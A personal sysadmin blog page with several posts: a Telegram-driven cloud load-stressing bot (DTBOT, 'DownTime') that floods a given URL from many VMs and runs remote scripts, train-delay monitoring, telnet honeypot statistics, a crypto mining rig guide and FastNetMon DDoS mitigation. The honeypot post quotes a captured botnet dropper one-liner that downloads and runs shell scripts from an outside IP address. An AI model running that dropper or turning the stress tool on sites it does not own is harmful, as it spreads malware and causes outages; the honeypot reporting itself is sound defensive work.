-
Loadstressing from the cloud with DTBOT
Today i finally decided to opensource some of my code created to reach my maximum level of lazyness, Automatically loadstressing web infrastructures via Telegram.
The other challenge was to see/prove if Golang can be a replacement/alternative for Python scripting.Repo: https://github.com/fnzv/DTBOT
Here is the diagram to better explain what i wanted to do:
Disclaimer before i even start
I’m not responsible for anything you do with this tool, this was made only for legit web loadstressing/benchmarking YOUR OWN infra.
I know that most of the code can be written more efficently/well, don’t hate on my exec_shell() ahah
end of disclamerThe main “ingredients” are:
- Ansible
- Golang
- Telegram
- At least one cloud provider with some resources
It all starts from the Telegram Bot that keeps listening commands from the allowed “chat_id” configured and whenever a predefined command is sent the bot (Written in Golang) runs the Ansible playbook with extra args and gives feedback to the user via Telegram.
This is a classic example for load stressing from Openstack using DTBOT:
1) User writes to Loadstresser bot chat “/create 5” which triggers the bot to execute the underlying Ansible playbook to deploy 5 VMs on the Openstack Configured Credendials.
If you check the logs (/var/log/dtbot.log) with a small Ansible background you can understand what’s really happening:
2018/05/19 14:35:46 Command: source /etc/dtbot/os_creds && ansible_python_interpreter=/usr/bin/python3 ANSIBLE_HOST_KEY_CHECKING=False ansible-playbook -vv /etc/dtbot/playbooks/create-infra.yaml --extra-vars="total_nodes=5 telegramtoken=botTOKEN telegramchatid=CHATID"
2) After a few minutes User recieves feedback that VMs are ready and can start loadstressing with:
/load http://example.org <Num clients> <Num VMs involved> <Time in seconds>
The defined command /load was created for simplicity and uses WRK (https://github.com/wg/wrk) as a stresser which works great out of the box without complex configuration files.
After some time passed loadstressing i decided to add a bit of complexity with Jmeter configurations and custom bash scripts so any User can configure or use it’s own loadstressing tool (jmeter, vegeta, nghttp2, locust.io ..).
The defined commands for custom Jmeter scripts are /loadj (Openstack) and /loadj_aws (AWS) which follows the exact previous work flow (Telegram -> Golang -> Ansible) but loads a remote configuration file (.jmx in case of Jmeter) and executes the tool with the custom configuration file.
Note: The remote configuration file must be RAW (gist/any pastebin can be used for this).
Example: /loadj
or /loadj_aws (to run jmx conf on all AWS nodes) You can find a simple .jmx example inside the repo under examples/
If you reached that point and you still asking what DT stands for.. well it’s just “DownTime” :)
Brief How To/Usage (more info on github repo):
1) Create a bot and save the bot Token, you can do it by writing “/newbot” to BotFather (https://telegram.me/botfather)
2) Use the Quick-Install of dtbot on a Ubuntu 16.04 machine and configure it.
Required configuration files are located under/etc/dtbot/
:- dtbot.conf ( Chat ID and Telegram Token, to find what chat id you have just write some messages to your bot and then open from the browser this url: https://api.telegram.org/bot
/getUpdates ) - os_creds (if you want to create VMs on the Openstack Provider) - Openstack credential source file
- aws_creds` (if you want to create VMs on AWS) - AWS ACCESS and SECRET key source file (you just need the exports for those enviroment variables)
3) (re)start dtbot via systemd: service dtbot restart
If everything is fine you should see “Authorized on account BOT_NAME” on /var/log/dtbot
3.5) Take some time to adjust the Ansible Playbooks based on your cloud enviroment (AWS or Openstack):
/etc/dtbot/playbooks/aws-create-infra.yaml
- You can keep it as-is but you need to change the “key_name:” with one present in your account, this VM should be able to SSH into newly created AWS instances with this key so generate a new key on the machine and add it to AWS)/etc/dtbot/playbooks/create-infra.yaml
- The only part that needs to be changes is the “flavor:” and “image:” name wich changes based on the Openstack provider- Other changes that might be done are always the same but on also the other playbooks: info.yaml,ddos.yaml (Openstack flavor,image)
4) Try to send some commands to your Telegram Bot:/help - shows the command list /create N - Deploys N VMs on Openstack, multiple runs won't deploy more VMs but just checks is N VM is present /create_aws N - Deploys N VM on AWS, multiple runs will deploy more VMs /stop N - Stops loadstressing tasks on N VMs (Openstack) /stop_aws - Stops all loadstressing tasks on ALL AWS VMs /destroy N - Deletes N VMs created on Openstack (0 to N) /destroy_aws - Deletes ALL loadstressing VMs created on AWS (Will just shutoff all VMs accessible by the dtbot key and therefore will be deleted because of 'delete on shutoff') /load <URL> <Num clients> <Num VMs involved> <Time in seconds> - Start load stressing on Openstack N VMs /load_aws <URL> <Num clients> <Time in seconds> - Start load stressing on ALL AWS create VMs /loadj <URL> <Num VMs involved> - Executes given JMX Jmeter script on N VMs (Openstack), URL must be raw and displaying directly the text /loadj_aws <URL> - Executes given JMX Jmeter script on all AWS VMs, URL must be raw and displaying directly the text /load_custom <URL> <Total nodes> - Executes custom bash script provided on Openstack VMs, URL must be raw and displaying directly the text /load_custom_aws <URL> - Executes custom bash script provided on all AWS VMs, URL must be raw and displaying directly the text /info N - Gathers info on N VMs on Openstack (Established connections and ifconfig stats), useful to check current stresstest status. (Example: start /load then after all the VMs started check /info N to see stats/data)
5) Start loadstressing and tune your infra cache,db & webserver… repeat :)
Pro-Tips:
- The bot can be added to Telegram Groups and accept commands from all members of the group, just find out the chat_id of the group and add it into the dtbot.conf
- Check the logs on /var/log/dtbot.log to see what’s happening and in case change parameters/values on ansible playbooks.
- Execute manually Ansible on the dtbot VM to see if something is wrong (ansible-playbook -vv, you can copy/paste the command from the logs)
- On AWS use a different region from your production env
- Ansible
-
Monitoring trains the sysadmin way
After discovering that the site viaggiatreno.it and lefreccie.it kindly offers some API to their train data i decided to implement my own monitoring system to get a complete overview of what is happening in the public train system and never miss a train.
Master Plan:
1) Scrape all data available (Train departure/arrival,delays,stations….)
2) Standardize the format so i can implement pluggable systems (Grafana, Telegram Bot, Website, Twitter..)
3) At least have fun when i hear “We are sorry for the inconvenience” while i check my systems
Scraping all the relevant datasets
All the data is collected with a script every 30 minutes using as input the site APIs and station lists, the ouput will be saved into InfluxDB (Legit, delay time tracking with timeseries DBs) and a local folder for historical data that i will use later with git.
Standardize format
To allow multiple systems comunicate together you always need to take raw data (train datasets) and standardize it into a more pluggable format:
- InfluxDB (Pros: A lot of client support, Grafana, Alerts, SQL… Cons: Some more resources usage)
- Git+Local (Pros: Efficent historical data tracking and easy full-text search… Cons: None)
Developing “Pluggable” systems:
- The Grafana Dashboard gathers all the relevant metrics that i cherry picked from InfluxDB (Train departure/arrival, delay, last station detected, train number, timestamp).
With this datasets i could easily create a dashboard that can really give you all the information that you can see on station information display sistems.
- The telegram bot https://t.me/Trenordalerts_bot is written in Go and with under 300 lines of code is it possible to read all the collected data of delays and comunicate them to the user.
The alerting part of the bot is more complex than the “Give me info of xyz train” because i need to identify the user before sending an alert (obvious.. i don’t want to recieve alerts of my friend’s train) so i implemented
a connector with a relational DB where i track chat_ids and alerts.
- Static Website https://trenistats.it
This is where the magic happens , the flow of the data is very simple now and i just need to gather data from one of my inputs (InfluxDB,Git or Local Dir) and show some graphs. How? The html code is automatically generated via a running script that collects the data from the local repo and generates the index.html for the static site. Even if i’m not a frontend specialist i managed to make something cool out of it (pure google fu skills and design 101) - Twitter bot https://twitter.com/trenistats
The bot gathers information from the local repo and triggers alerts via Twitter APIs if trains start/have long delays and tagging the main italian company that’s responsible for the transportation system. Like the Telegram bot this is written in Go with very few lines, basicaly take what i have already did for Telegram + Twitter API integration.
That’s it, i could have gone far into dashboarding and alerting but this setup seems to work fine for me.
I tried integrating Elasticsearch + Kibana for more fun stuff but Influx + Grafana did the job very well (it just works.. and no json decoding fights). -
Some (fun) stats from a running Telnet honeypot (YAFH)
Telnet sessions:
netstat -peanut | grep 23 | grep ESTABLISHED | wc -l 185
Total connection recieved last month:
grep CONNECTION yafh-telnet.log | wc -l 644
Most common wget/busybox attempt (Dont run it…i implemented accidental copy-pasta protection here #):
# /bin/busybox wget; /bin/busybox 81c46036wget; /bin/busybox echo -ne '\x0181c46036\x7f'; /bin/busybox printf '\00281c46036\177'; /bin/echo -ne '\x0381c46036\x7f'; /usr/bin/printf '\00481c46036\177';
Top 15 password used (The honeypot was designed to allow any password access):
<empty> 1234 password admin 12345 1234 Win1doW$ user pass aquario (??Really??) admin 888888 7ujMko0admin 666666 5up 54321 1234567890 123456 1111 12345
One-liner of the year goes to:
cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin wget;wget http://165.227.121.222/bin.sh; sh bin.sh; wget1 http://165.227.121.222/bin2.sh; sh bin2.sh; tftp -r tftp.sh -g 165.227.121.222; sh tftp.sh; tftp 165.227.121.222 -c get tftp2.sh; sh tftp2.sh;mv /bin wget /bin/-wget;mv /usr/sbin/wget /usr/sbin/-wget;mv /usr/bin/wget /usr/bin/-wget;mv /sbin/wget /bincd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://165.227.121.222/bin.sh; sh bin.sh; wget1 http://165.227.121.222/bin2.sh; sh bin2.sh; tftp -r tftp.sh -g 165.227.121.222; sh tftp.sh; tftp 165.227.121.222 -c get tftp2.sh; sh tftp2.sh;mv /bin/wget /bin/-wget;mv /usr/sbin/wget /usr/sbin/-wget;mv /usr/bin/wget /usr/bin/-wget;mv /sbin/wget /bincd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://165.227.121.222/bin.sh; sh bin.sh; wget1 http://165.227.121.222/bin2.sh; sh bin2.sh; tftp -r tftp.sh -g 165.227.121.222; sh tftp.sh; tftp 165.227.121.222 -c get tftp2.sh; sh tftp2.sh;mv /bin/wget /bin/-wget;mv /usr/sbin/wget /usr/sbin/-wget;mv /usr/bin wget /usr/bin/-wget;mv /sbin/wget /bincd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://165.227.121.222/bin.sh; sh bin.sh; wget1 http://165.227.121.222/bin2.sh; sh bin2.sh; tftp -r tftp.sh -g 165.227.121.222; sh tftp.sh; tftp 165.227.121.222 -c get tftp2.sh; sh tftp2.sh;mv /bin/wget /bin/-wget;mv /usr/sbin/wget /usr/sbin/-wget;mv /usr/bin/wget /usr/bin/-wget;mv /sbin/wget /bincd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://165.227.121.222/bin.sh; sh bin.sh; wget1 http://165.227.121.222/bin2.sh; sh bin2.sh; tftp -r tftp.sh -g 165.227.121.222; sh tftp.sh; tftp 165.227.121.222 -c get tftp2.sh; sh tftp2.sh;mv /bin/wget /bin/-wget;mv /usr/sbin/wget /usr/sbin/-wget;mv /usr/bin/wget /usr/bin/-wget;mv /sbin/wget /bincd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://165.227.121.222/bin.sh; sh bin.sh; wget1 http://165.227.121.222/bin2.sh; sh bin2.sh; tftp -r tftp.sh -g 165.227.121.222; sh tftp.sh; tftp 165.227.121.222 -c get tftp2.sh; sh tftp2.sh;mv /bin/wget /bin/-wget;mv /usr/sbin/wget /usr/sbin/-wget;mv /usr/bin/wget /usr/bin/-wget;mv /sbin/wget /bincd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://165.227.121.222/bin.sh; sh bin.sh; wget1 http://165.227.121.222/bin2.sh; sh bin2.sh; tftp -r tftp.sh -g 165.227.121.222; sh tftp.sh; tftp 165.227.121.222 -c get tftp2.sh; sh tftp2.sh;mv /bin/wget /bin/-wget;mv /usr/sbin/wget /usr/sbin/-wget;mv /usr/bin/wget /usr/bin/-wget;mv /sbin/wget /bincd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://165.227.121.222/bin.sh; sh bin.sh; wget1 http://165.227.121.222/bin2.sh; sh bin2.sh; tftp -r tftp.sh -g 165.227.121.222; sh tftp.sh; tftp 165.227.121.222 -c get tftp2.sh; sh tftp2.sh;mv /bin/wget /bin/-wget;mv /usr/sbin/wget /usr/sbin/-wget;mv /usr/bin/wget /usr/bin/-wget;mv /sbin/wget /bincd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://165.227.121.222/bin.sh; sh bin.sh; wget1 http://165.227.121.222/bin2.sh; sh bin2.sh; tftp -r tftp.sh -g 165.227.121.222; sh tftp.sh; tftp 165.227.121.222 -c get tftp2.sh; sh tftp2.sh;mv /bin/wget /bin/-wget;mv /usr/sbin/wget /usr/sbin/-wget;mv /usr/bin/wget /usr/bin/-wget;mv /sbin/wget /bin
What really surprises me on these stats are the constant active sessions (185) that these C2s are keeping on telnet devices even if the device is a fake honeypot that records any command.
I’m still looking for a cool wget to analyze and have fun in a sandboxed enviroment but till today only old wgets and common commands are getting into the honeypot.
Link to project: https://github.com/fnzv/YAFH -
Setting up your first Mining rig (Using Ubuntu 16.04 LTS Server)
Since a few months i started getting more and more interested in crypto and now i can share my experience with Mining.
At the very beginning of Mining many were attracted by Bitcoin since the difficulty was so low that everyone with some spare GPUs could start and be an active node of the Bitcoin network and earn some satoshi, Nowadays this is still a thing but the miners have evolved and investors came into the game with huge datacenters full of ASICs/13 GPU rigs dedicated to mining a single coin and boosting the difficulty to the very top causing low budget miners to shutoff their rigs since you cannot make any profits with just a bunch of GPUs.
What happened next? Different coins started becoming profitable and allowing more GPU owners to jump into the mining game using another cryptocurrency like Ethereum, Zcash, Ethereum Classic, Monero.. and many others, if you ever noticed GPU prices this summer you probably saw that the value of AMD/Nvidia GPUs was incredibly high and the European/American market started struggling finding those cards as “Mining Whales” started buying 300-400 cards per order making Hobbist/Gamers life harder.Ok cool, now i see that Ethereum/Zcash/Monero/…Coin xyz… is still PoW(Proof of Work) and i can mine coins till end of 20xx how can i start mining?
First of all you need to consider that mining takes a lot of energy at least 80-140W per card depending on under/overclock settings so if your electrical system cannot sustain the draw of all the total energy you cannot start mining there.
After you have made your elettrical considerations you can start setting up your Mining rig, the only components necessary for mining are:-
Multiple GPUs: Depending on the algorithm you need to choose the best Hashrate per Watt, for example if you want to mine only Zcash the best GPUs for this coins are Nvidia because of their hardware architecture (Pascal) that is much more
effective with coins like Zcash whereas on AMD cards you will perform better on Ethereum coins (Just look for AMD RX 4xx/5xx vs Nvidia GTX 10XX benchmaks and see the Hashrate per Watt differences). -
Motherboard: This is a key choice because will decide how many GPU cards can you fit into a single rig, the best option are BTC edition (MoBo that were designed for BTC mining) because they can fit up to 6-13 PCI-e slots
-
CPU: The only requirement for the CPU is that supports the Motherboard socket but in case you want to start CPU mining then you need to search for the most appropriate CPU and rethink about the Motherboard.
- PSU: Another important choice is the power supply not only for the connectors (if you have 5 or more GPUs you need to take into account that you need 5 PCI power connectors and another 5 for the Risers) but also for Watt and efficiency.
Don’t be cheap on the quality and take only Gold/Silver/Platinum PSUs.
- Storage: SSD drives today are cheap and draw less power than standard HD, you need up to 60GB depending on the mined coin and if you need to store the complete Blockchain.
- Risers: Those connectors allow you to fit multiple GPUs into the single motherboard because you cannot keep 6+ GPUs directly connected on the motherboard so you need to extend the PCI-e adapter.
Important consideration: Risers (Sata or Molex) must be feed from different cables and not all from the same PSU cable because of Amperage can burn connectors as they can only draw less than 70W, what you can do:
4 GPUs –> Directly connected to PSU PCI-e power connectors (example: 2 cables from PSU with 2 PCI-e power connectors)
4 Risers –> converted to Sata –> 2 PSU sata cables (NO MORE THAN 2 SATA CABLES PER POWER CABLE FROM PSU)
The best option should be one cable per Riser connector/GPU but for this you will end up having at least 2-3 PSUs, many people say that the limit is 2-3 cables on the same power cable coming from PSU.
After you got all the hardware you just need to connect all the hardware (If you don’t have experience you can google how to build a pc and basically it’s the same thing), you need to choose your OS: - EthOS - Mining distro based on Ubuntu with all drivers/mining scripts ready
- SMOS - Mining OS much like EthOS
- Pure Windows - Install the OS and check for the correct GPU drivers and use MSIAfterburner or EVGA Precision for overclocking (Some have issues with Windows 10 and have switched to 7 for driver stability)
- Ubuntu 16.04 - If you have some Linux experience this is your best option, you need only to install/compile the correct drivers and start mining
Setting Up your Ubuntu 16.04 Miner (Nvidia):
Adding the Graphics repository
sudo apt-add-repository ppa:graphics-drivers/ppa
Installing the drivers and Nvidia SMI
sudo apt-get install nvidia-smi
sudo apt-get install nvidia-384
** To correctly run Nvidia Drivers you must install startx and configure the GPUs with “Fake” Screens as on Ubuntu 16.04 LTS Server there is no gui.. (Files that you should configure are /root/.xinitrc for OC settings and /etc/X11/xorg.conf for “Fake” screens attached to GPUs)
Now you just have to choose your miner and mining pool to start mining (I assume you already have a Wallet for the coin you want to mine).
Examples:
EWBF Miner –> Zcash
Ethminer –> Ethereum
ccminer –> Monero
Most of those scripts have examples inside them so you need only to change Wallet/Pool settings:
EWBF:
0.3.4b/miner –server POOL-ADDRESS –user WALLET-ADDRESS.RIG-NAME –pass z –port 3333 –pec –log 2 –logfile /var/log/ewbf.log –tempunits C –templimit 85
To start mining you just have to start the mining script (under a screen session to keep the script active even when you close terminal) and keep an eye on GPU,connectors temps (green zone is 50-70, warning zone 70-80 but still ok, critical zone 80-90, gpu lock/driver automatically stops 90-100) .Some of the most known mining pools are:
- https://nanopool.org
- http://dwarfpool.com/
- https://zcash.flypool.org/
- https://ethermine.org/
- http://nicehash.com/
Almost every mining pool will allow you to see statistics via web & or alerting via email if miner shuts down.
You can also set up your own pool but it does make sense only if you have enough hashrate, for example if you have 1-5 rigs just go for a shared mining pool whereas if you have 20+ rigs you can start thinking about solo mining so all profits are maximized.
Remote Control is quite easy, since this is a Linux based system you can Portforward SSH ports on your Router and enable SSH-Key authentication for remote management (Filter IP ranges with IPtables if you know that you will connect only from provier X).
Other alternatives are:- OpenVPN on rig –> PortForward OpenVPN ports –> Connect via Android Device to VPN –> SSH OR Miner API managemnt via VPN.
- Telegram Bot listening for you commands and sends you information about the miner (for example trsh script: https://github.com/fnzv/trsh –> create custom commands for example /gpu_stats –> gives back to you gpu statistics)
- Setting up a VPN with your Router then from there connect to your rig (OpenWRT,DD-WRT & co..)
- … your own backdoor :)
After you are up and running just HODL and keep mining -
-
How to detect & mitigate (D)DoS Attacks using FastNetMon
Recently i was researching a lot on the various denial of service attacks and how to mitigate them from Layer 1 to 7 and as always the most convinient way to stop any attacks is keeping the bad requests/traffic away from your services starting from the first layers of the ISO/OSI model.Realistically the only ways to prevent DDoS attacks are:
a) Layer 3-4 mitigation with BGP/Cloud Scrubbing (Sending all your network traffic using BGP or ‘sophisticated’ VPNs to third-party POP’s to delegate attack mitigation).
- Pros: This is the only and smart way to properly mitigating attacks, your services won’t be hit by attacks/malicious traffic.
- Cons: Paying an External Provider & bandwidth costs, All your traffic is re-routed so latency, packetloss and any other network issue that could happen to the External Provider affects you directly….And yes there could be false positives and customers may be locked out of their services.
b) DNS Obfuscation/CDN Mitigation/Proxying only legit requests, a well-known example is CloudFlare (Kinda like Security through Obfuscation.. and it works only if you have certain services and know your stuff.) - Pros: If you only have HTTP(S) services exposed this is a great option and it’s cheap or free.. (You can also setup your own private proxying with Nginx on some VPS/Cloud provider with DDoS protection).
- Cons: Doesn’t work well if you have other exposed services like Email servers,FTP or any dedicated exposed network assigned to you (Example.. if you are a Carrier you can’t just hide your site using DNS since they will hit you announced AS networks…)
c) Layer 6-7 mitigation using server/service side counter-measures (Enabling Nginx rate limiting, Cache filtering, Apache mod_security & mod_evasive bans ..) - Pros: Easily to configure and some low-end attacks can be mitigated (Example: Website scans, Automated Bots/Aggressive crawlers..)
- Cons: A real attack will saturate your Uplink and bring you down all your services
d) DIY DDoS protection using Linux boxes and the good old packet filter. - Pros: It’s free, it just works, You need only to create your own “patterns” and attack/network blacklists.
- Cons: You need to have at least 100G Uplinks and expesive dedicated servers to process all fast incoming/outgoing traffic, You have to manage all the network issues your self and if you saturate your link with the upstream BGP provider they may drop your traffic and/or blackhole you anyways as no one wants unwanted bandwidth costs & saturated links by malicious traffic or bogus packets.
Before do you even think of option d) watch this:
Cool, but how i detect attacks? Well if you have $$ and you only believe enterprise stuff
–> grab that 500+ grand network box and put it in front of your DC… whereas if you are an opensource guy you can go for FastNetMon (By Pavel Odintsov) and setup your own Anti-DDoS detection/mitigation solution.
What is FastNetMon?
FastNetMon is DDoS analyzer that will let you to detect nearly realtime attacks or suspicious traffic (Example: VPS X is compromised and starts doing SYN Flood vs outbound nets –> detected and alerted by FNM), FNM isn’t just a
detection tool but also helps to mitigate attacks, after the ban rule is triggered a bash script is being executed (there are also a lot of ‘extra’ stuff to do.. Slack webhooks..Keep a track of Influx metircs..Email Alerts…Send an emergency call/SMS..BGP Announce…Shutoff the VPS)
Scenario 1:
VPS provider on Hypervisor X protects customers with FNM and when an attacks is detected on NetFlow/sFlow/IPFIX traffic the bash script automatically adds a blackhole rule on edge network device/hypervisor host to avoid degrading network performance for other customers
Scenario 2:
Carrier needs to monitor traffic flows on their network boxes, Set ups FNM and gather all flows to monitor subnets to re-route traffic (GoBGP & ExaBGP are supported by FNM) when links are saturated
..
…
And so on
The FNM setup is quite easy to get up and running, the tricky part is setting up Grafana,Influxdb metrics but that’s not a problem if you are interested only in detection/mitigation.
If you are into dashboarding you could also set up an ELK (this is the icing on the cake) to gather NetFlow data and create great visualization with Kibana (Total PPS in, Top “Talkers” on outgoing/incoming traffic, Traffic Categories, Sort by TCP/UDP..).The only requirements are:
- Small Server/Virtual Machine that will recieve all the flow traffic from routers/switches via a capture backend
- For automated BGP integration you need to allow the Server to talk directly to the routers/switches
Links and Resources:
- Github documentation
- FastNetMon site (Thank you Pavel for this project)
- Managing Flows (Great tool from Paolo Lucente) if you want to collect properly flows you can use nfacct
For any question & discussion don’t esitate contact me
- Pros: This is the only and smart way to properly mitigating attacks, your services won’t be hit by attacks/malicious traffic.